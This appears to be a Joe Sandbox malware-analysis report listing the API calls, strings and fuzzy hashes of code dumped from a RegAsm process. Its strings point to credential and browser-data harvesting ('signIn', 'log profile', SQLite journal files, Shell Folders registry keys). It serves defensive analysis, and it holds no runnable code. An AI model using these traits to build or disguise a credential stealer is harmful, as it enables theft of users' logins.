                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3212833200-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1470729244-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                                                                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                                                                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4131475296-0
                                                                                                                                                                                                                      • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                                                                                      • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                      • String ID:
